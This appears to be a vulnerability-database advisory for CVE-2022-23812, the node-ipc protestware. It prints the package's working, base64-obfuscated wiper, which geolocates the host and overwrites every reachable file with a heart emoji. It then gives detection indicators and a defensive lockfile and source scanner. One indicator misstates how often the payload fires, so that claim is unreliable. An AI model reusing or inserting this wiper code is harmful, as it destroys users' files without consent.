cbcvebase.
CVE-2022-23812
published 2022-03-16


Priority: P2 77 critical, CVSS 3.1 base score 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: ITW (exploited in the wild), VulnCheck KEV
EPSS: 4.16% (89.6th percentile)
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users whose IP address is located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior.

Malicious Code: **Note:** Don't run it!

```js
import u from "path";
import a from "fs";
import o from "https";

setTimeout(function () {
    // Random gate: continues only when Math.round(Math.random() * 4) is 0 or 1
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
    // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");             // "./"
            const o = Buffer.from("Li4v", "base64");             // "../"
            const r = Buffer.from("Li4vLi4v", "base64");         // "../../"
            const f = Buffer.from("Lw==", "base64");             // "/"
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); // "country_name"
            const e = Buffer.from("cnVzc2lh", "base64");         // "russia"
            const i = Buffer.from("YmVsYXJ1cw==", "base64");     // "belarus"
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));

// Recursively walks directory n; every regular file whose path contains o is overwritten
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64"); // "❤️"
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let s = null;
        try {
            s = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (s.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
            } catch (t) {}
        }
    }
    return f;
}

const ssl = true;
export { ssl as default, ssl };
```

Affected

5 ranges

| Vendor | Product | Version range | Fixed in |
| --- | --- | --- | --- |
| node-ipc_project | node-ipc | >= 10.1.1 < unspecified | unspecified |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 11.0.0 | |
| node-ipc_project | node-ipc | >= unspecified < 10.1.3 | 10.1.3 |

Detection & IOCs (extracted from sources)

url: https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
domain: api.ipgeolocation.io
  • Detect outbound HTTPS GET requests to api.ipgeolocation.io with the specific API key ae511e1627824a968aaaa758a5309154 in the query string, originating from Node.js processes — this is the geolocation beacon used to determine if the victim is in Russia or Belarus before triggering the payload.
  • Alert on mass file overwrites where file contents are replaced with the heart emoji (❤️, UTF-8 bytes E2 9D A4 EF B8 8F). The malware recursively traverses ./, ../, ../../, and / and calls fs.writeFile on every reachable file.
  • Flag presence of node-ipc versions 10.1.1 or 10.1.2 in package-lock.json / node_modules, as these are the confirmed malicious versions removed from the NPM registry.
  • Detect base64-encoded strings 'Li8=', 'Li4v', 'Li4vLi4v', 'Lw==', 'Y291bnRyeV9uYW1l', 'cnVzc2lh', 'YmVsYXJ1cw==', '4p2k77iP' within JavaScript source files or evaluated strings — these are obfuscation markers unique to this malware.
  • From node-ipc version 11.0.0 onwards, the malicious behavior is delegated to the imported 'peacenotwar' package rather than being inline — audit dependency trees for peacenotwar as a transitive dependency.
  • The setTimeout delay is randomized (Math.ceil(Math.random() * 1e3) ms) and execution is probabilistic (only fires ~75% of the time via Math.round(Math.random()*4) > 1 check) — sandbox detonation may not trigger on first run; repeat execution is needed for reliable detection.
  • The geolocation API key (ae511e1627824a968aaaa758a5309154) is hardcoded in the malware. If the key is revoked or the endpoint changes, the geolocation check silently fails and no file destruction occurs; victims outside Russia/Belarus are unaffected by the destructive payload, but the beacon call still fires.
  • Versions 10.1.1 and 10.1.2 were removed from the NPM registry; version 10.1.3 is the patched release. Environments with cached or vendored copies of 10.1.1/10.1.2 remain at risk even after registry removal.
  • The payload only triggers when the resolved country_name field (lowercased) contains 'russia' or 'belarus'. VPN or proxy usage by victims in those countries would bypass the geolocation check and prevent file destruction.
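As an added example (not code from the advisory or from node-ipc), the following Node.js script applies two of the static checks above to constructed inputs: it audits the `packages` map of an npm lockfile (v2/v3 layout) for node-ipc in the malicious range and for any peacenotwar entry, and it scans JavaScript source text for the quoted base64 markers and the hardcoded API key. The sample lockfile, its version numbers and the sample source string are constructed for the demonstration.

```javascript
// Added example (not the advisory's or node-ipc's code): static checks for the
// CVE-2022-23812 indicators listed above, run on constructed sample inputs.
const MARKERS = ["Li8=", "Li4v", "Li4vLi4v", "Lw==", "Y291bnRyeV9uYW1l", "cnVzc2lh", "YmVsYXJ1cw==", "4p2k77iP"];
const BEACON_KEY = "ae511e1627824a968aaaa758a5309154"; // key from the beacon URL

// Numeric compare of dotted x.y.z versions (enough for node-ipc release tags).
function cmpVersion(a, b) {
  const pa = a.split(".").map(Number), pb = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Walk the "packages" map of an npm lockfile (v2/v3 shape; keys look like
// "node_modules/node-ipc" or "node_modules/foo/node_modules/node-ipc").
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = path.split("node_modules/").pop();
    const v = entry.version || "0.0.0";
    if (name === "node-ipc" && cmpVersion(v, "10.1.1") >= 0 && cmpVersion(v, "10.1.3") < 0) {
      findings.push(`${path}@${v}: malicious node-ipc release (CVE-2022-23812)`);
    } else if (name === "peacenotwar") {
      findings.push(`${path}@${v}: peacenotwar present (node-ipc >= 11.0.0 behaviour)`);
    }
  }
  return findings;
}

// Scan JavaScript source text for the quoted base64 markers (decoded in the
// report) and for the hardcoded geolocation API key.
function scanSource(src) {
  const hits = MARKERS
    .filter((m) => src.includes(`"${m}"`) || src.includes(`'${m}'`))
    .map((m) => `${m} (${Buffer.from(m, "base64").toString("utf8")})`);
  if (src.includes(BEACON_KEY)) hits.push("ipgeolocation API key");
  return hits;
}

// Constructed sample inputs, not taken from any real project.
const SAMPLE_LOCK = { packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/node-ipc": { version: "10.1.2" },
  "node_modules/some-plugin/node_modules/node-ipc": { version: "9.2.1" },
  "node_modules/peacenotwar": { version: "1.0.0" },
} };
const SAMPLE_SRC = 'const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64");';
console.log(auditLockfile(SAMPLE_LOCK), scanSource(SAMPLE_SRC));
```

To use it on a real tree, read and `JSON.parse` the project's package-lock.json for `auditLockfile` and feed each `.js` file's text to `scanSource`.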

CVSS provenance

| Source | Version | Score | Severity | Vector |
| --- | --- | --- | --- | --- |
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |